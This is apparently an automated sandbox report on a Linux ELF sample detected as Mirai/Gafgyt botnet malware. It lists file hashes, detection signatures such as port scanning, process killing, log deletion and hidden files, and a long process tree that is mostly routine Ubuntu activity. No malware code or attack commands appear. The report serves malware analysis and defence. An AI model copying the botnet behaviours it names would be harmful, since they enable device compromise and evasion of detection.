Linux Analysis Report nSg5RM0w0d

Overview

General Information

Sample Name: nSg5RM0w0d
Analysis ID: 553468
MD5: 5ba84075b6789440e97cb6095ad55c32
SHA1: 19c16b64b5482561db39de26034459274b9dfb91
SHA256: 65222b0aa3c9aa64a92d8c4aa20e664ff6a7049c8b70dac73d85794407a32ded
Tags: 32 elf mirai motorola

Detection

Gafgyt Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara detected Gafgyt
Connects to many ports of the same IP (likely port scanning)
Reads system files that contain records of logged in users
Uses known network protocols on non-standard ports
Sample tries to kill multiple processes (SIGKILL)
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Sample has stripped symbol table
Sample tries to set the executable flag
Executes commands using a shell command-line interpreter

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 553468
Start date: 15.01.2022
Start time: 00:09:55
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 38s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: nSg5RM0w0d
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Detection: MAL
Classification: mal100.spre.troj.lin@0/184@16/0
Warnings:
  • Connection to analysis system has been lost, crash info: Unknown
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: nSg5RM0w0d

Process Tree

  • system is lnxubuntu20
  • systemd New Fork (PID: 5192, Parent: 1)
  • logrotate (PID: 5192, Parent: 1, MD5: ff9f6831debb63e53a31ff8057143af6) Arguments: /usr/sbin/logrotate /etc/logrotate.conf
    • gzip (PID: 5233, Parent: 5192, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5234, Parent: 5192, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\n\t\tinvoke-rc.d --quiet cups restart > /dev/null\n" logrotate_script "/var/log/cups/*log "
      • sh New Fork (PID: 5235, Parent: 5234)
      • invoke-rc.d (PID: 5235, Parent: 5234, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: invoke-rc.d --quiet cups restart
        • runlevel (PID: 5236, Parent: 5235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /sbin/runlevel
        • systemctl (PID: 5238, Parent: 5235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-enabled cups.service
        • ls (PID: 5242, Parent: 5235, MD5: e7793f15c2ff7e747b4bc7079f5cd4f7) Arguments: ls /etc/rc[S2345].d/S[0-9][0-9]cups
        • systemctl (PID: 5243, Parent: 5235, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active cups.service
    • gzip (PID: 5244, Parent: 5192, MD5: beef4e1f54ec90564d2acd57c0b0c897) Arguments: /bin/gzip
    • sh (PID: 5245, Parent: 5192, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c /usr/lib/rsyslog/rsyslog-rotate logrotate_script /var/log/syslog
      • sh New Fork (PID: 5246, Parent: 5245)
      • rsyslog-rotate (PID: 5246, Parent: 5245, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/lib/rsyslog/rsyslog-rotate
        • systemctl (PID: 5247, Parent: 5246, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl kill -s HUP rsyslog.service
  • systemd New Fork (PID: 5194, Parent: 1)
  • install (PID: 5194, Parent: 1, MD5: 55e2520049dc6a62e8c94732e36cdd54) Arguments: /usr/bin/install -d -o man -g man -m 0755 /var/cache/man
  • systemd New Fork (PID: 5232, Parent: 1)
  • find (PID: 5232, Parent: 1, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: /usr/bin/find /var/cache/man -type f -name *.gz -atime +6 -delete
  • systemd New Fork (PID: 5237, Parent: 1)
  • mandb (PID: 5237, Parent: 1, MD5: 1dda5ea0027ecf1c2db0f5a3de7e6941) Arguments: /usr/bin/mandb --quiet
  • nSg5RM0w0d (PID: 5278, Parent: 5120, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/nSg5RM0w0d
  • systemd New Fork (PID: 5306, Parent: 1)
  • journalctl (PID: 5306, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5321, Parent: 1)
  • systemd-journald (PID: 5321, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5322, Parent: 1)
  • journalctl (PID: 5322, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5372, Parent: 1)
  • dbus-daemon (PID: 5372, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5383, Parent: 1)
  • whoopsie (PID: 5383, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5386, Parent: 1860)
  • pulseaudio (PID: 5386, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5391, Parent: 1)
  • systemd-logind (PID: 5391, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5394, Parent: 1)
  • rtkit-daemon (PID: 5394, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5454, Parent: 1)
  • polkitd (PID: 5454, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5459, Parent: 1)
  • rsyslogd (PID: 5459, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5461, Parent: 1)
  • agetty (PID: 5461, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • gdm3 New Fork (PID: 5462, Parent: 1320)
  • Default (PID: 5462, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5468, Parent: 1320)
  • Default (PID: 5468, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5469, Parent: 1320)
  • Default (PID: 5469, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5470, Parent: 1)
  • gpu-manager (PID: 5470, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5471, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5472, Parent: 5471)
      • grep (PID: 5472, Parent: 5471, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5473, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5474, Parent: 5473)
      • grep (PID: 5474, Parent: 5473, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5475, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5476, Parent: 5475)
      • grep (PID: 5476, Parent: 5475, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5477, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5478, Parent: 5477)
      • grep (PID: 5478, Parent: 5477, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5479, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5480, Parent: 5479)
      • grep (PID: 5480, Parent: 5479, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5482, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5483, Parent: 5482)
      • grep (PID: 5483, Parent: 5482, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5484, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5485, Parent: 5484)
      • grep (PID: 5485, Parent: 5484, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5488, Parent: 5470, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5489, Parent: 5488)
      • grep (PID: 5489, Parent: 5488, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5491, Parent: 1)
  • generate-config (PID: 5491, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5492, Parent: 5491, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5493, Parent: 1)
  • gdm-wait-for-drm (PID: 5493, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5498, Parent: 1)
  • gdm3 (PID: 5498, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5503, Parent: 5498)
    • plymouth (PID: 5503, Parent: 5498, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 5521, Parent: 5498)
    • gdm-session-worker (PID: 5521, Parent: 5498, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
      • gdm-wayland-session (PID: 5525, Parent: 5521, MD5: d3def63cf1e83f7fb8a0f13b1744ff7c) Arguments: /usr/lib/gdm3/gdm-wayland-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
        • dbus-daemon (PID: 5527, Parent: 5525, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 3 --session
          • dbus-daemon New Fork (PID: 5529, Parent: 5527)
            • false (PID: 5530, Parent: 5529, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
        • dbus-run-session (PID: 5531, Parent: 5525, MD5: 245f3ef6a268850b33b0225a8753b7f4) Arguments: dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart
          • dbus-daemon (PID: 5532, Parent: 5531, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --nofork --print-address 4 --session
    • gdm3 New Fork (PID: 5535, Parent: 5498)
    • Default (PID: 5535, Parent: 5498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 5536, Parent: 5498)
    • Default (PID: 5536, Parent: 5498, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5504, Parent: 1)
  • accounts-daemon (PID: 5504, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5514, Parent: 5504, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5515, Parent: 5514, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5516, Parent: 5515, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5517, Parent: 5516)
          • locale (PID: 5517, Parent: 5516, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5518, Parent: 5516)
          • grep (PID: 5518, Parent: 5516, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • fusermount (PID: 5544, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5565, Parent: 1)
  • journalctl (PID: 5565, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5566, Parent: 1)
  • systemd-journald (PID: 5566, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5567, Parent: 1)
  • whoopsie (PID: 5567, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5571, Parent: 1)
  • dbus-daemon (PID: 5571, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5575, Parent: 1)
  • systemd-logind (PID: 5575, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5633, Parent: 1)
  • gpu-manager (PID: 5633, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5634, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5635, Parent: 5634)
      • grep (PID: 5635, Parent: 5634, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5636, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5637, Parent: 5636)
      • grep (PID: 5637, Parent: 5636, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5639, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5640, Parent: 5639)
      • grep (PID: 5640, Parent: 5639, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5641, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5642, Parent: 5641)
      • grep (PID: 5642, Parent: 5641, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5643, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5644, Parent: 5643)
      • grep (PID: 5644, Parent: 5643, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5645, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5646, Parent: 5645)
      • grep (PID: 5646, Parent: 5645, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5650, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5651, Parent: 5650)
      • grep (PID: 5651, Parent: 5650, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5654, Parent: 5633, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5655, Parent: 5654)
      • grep (PID: 5655, Parent: 5654, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5647, Parent: 1)
  • journalctl (PID: 5647, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5653, Parent: 1)
  • rsyslogd (PID: 5653, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5659, Parent: 1)
  • agetty (PID: 5659, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5660, Parent: 1)
  • generate-config (PID: 5660, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5661, Parent: 5660, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5662, Parent: 1)
  • gdm-wait-for-drm (PID: 5662, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5667, Parent: 1)
  • journalctl (PID: 5667, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5668, Parent: 1)
  • systemd-journald (PID: 5668, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5669, Parent: 1)
  • whoopsie (PID: 5669, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5671, Parent: 1)
  • dbus-daemon (PID: 5671, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5674, Parent: 1)
  • systemd-logind (PID: 5674, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5697, Parent: 1)
  • gdm3 (PID: 5697, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5738, Parent: 5697)
    • plymouth (PID: 5738, Parent: 5697, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
  • systemd New Fork (PID: 5734, Parent: 1)
  • rsyslogd (PID: 5734, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5740, Parent: 1)
  • agetty (PID: 5740, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5744, Parent: 1)
  • accounts-daemon (PID: 5744, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5751, Parent: 5744, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5752, Parent: 5751, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5753, Parent: 5752, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5754, Parent: 5753)
          • locale (PID: 5754, Parent: 5753, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5755, Parent: 5753)
          • grep (PID: 5755, Parent: 5753, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 5746, Parent: 1)
  • systemd-journald (PID: 5746, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5750, Parent: 1)
